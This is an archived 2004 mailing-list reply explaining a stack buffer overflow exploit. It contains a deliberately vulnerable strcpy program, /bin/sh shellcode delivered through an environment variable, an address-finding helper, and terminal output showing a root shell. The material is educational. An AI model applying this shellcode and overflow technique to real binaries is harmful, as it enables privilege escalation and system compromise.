Security Basics mailing list archives

Previous By Date Next
Previous By Thread Next

RE: Buffer Overflow problem

From: Shaun Colley <shaunige () yahoo co uk>
Date: Sat, 8 May 2004 08:24:28 +0100 (BST)
Hi,


The problem is incorrect padding. I'll try
explaining, but keep in mind 
that


I believe Krzysztof to be correct on this one.  You
need to write far enough past the buffer for your
address to reach EIP.
 

Try exploiting a program like this:

--- vuln.c ---
#include <stdio.h>

int main(int argc, char *argv[]) {
char buf[5];

strcpy(buf, argv[1]);

return(0);  /* shouldn't get here if we overflow buf
*/
}
--- EOF ---

Due to calculations, I happen to know that you would
need to overwrite 28 bytes past 'buf' to hit the EIP
register.  Try something like this:

--- example ---
[shaun@localhost tmp]$ perl -e 'print "\x90"x50 .
"\x31\xdb\x53\x8d\x43\x17\xcd\x80\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"'

shell

[shaun@localhost tmp]$ export HACK=`cat shell`
[shaun@localhost tmp]$ ./gtev HACK
HACK is stored at address 0xbffffa56
[shaun@localhost tmp]$ ./vuln `perl -e 'print "HACK"x7
. "\x56\xfa\xff\xbf"'`
sh-2.05b# exit
exit
[shaun@localhost tmp]$ ./vuln `perl -e 'print
"\x56\xfa\xff\xbf"x50'`
sh-2.05b# exit
exit
[shaun@localhost tmp]$
--- EO example ---

Using the environmental variable method to store
shellcode and nop sleds, it can make your job
substantially easier.  By the way, gtev.c is below
(the program I used to get the address of $HACK):

--- gtev.c ---
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {

        if(argc < 2) {
                printf("Usage: %s <environ_var>\n",
argv[0]);
                exit(-1);
        }

        char *addr_ptr;

        addr_ptr = getenv(argv[1]);

        if(addr_ptr == NULL) {
                printf("Environmental variable %s does
not exist!\n", argv[1]);
                exit(-1);
        }

        printf("%s is stored at address %p\n",
argv[1], addr_ptr);
        return(0);
}
--- EOF ---

I'm far from being an expert too, but remember this:
it's only as hard as you make it.  It's only, in
reality, a simple matter of placing some code in
memory, obtaining the address of that code, and then
overflowing the vulnerable buffer, thereby placing
your shellcode's address in EIP - thus your code is
executed.



Thank you for your time.
Shaun.



        
        
                
____________________________________________________________
Yahoo! Messenger - Communicate instantly..."Ping" 
your friends today! Download Messenger Now 
http://uk.messenger.yahoo.com/download/index.html

---------------------------------------------------------------------------
Ethical Hacking at the InfoSec Institute. Mention this ad and get $545 off 
any course! All of our class sizes are guaranteed to be 10 students or less 
to facilitate one-on-one interaction with one of our expert instructors. 
Attend a course taught by an expert instructor with years of in-the-field 
pen testing experience in our state of the art hacking lab. Master the skills 
of an Ethical Hacker to better assess the security of your organization. 
Visit us at: 
http://www.infosecinstitute.com/courses/ethical_hacking_training.html
----------------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: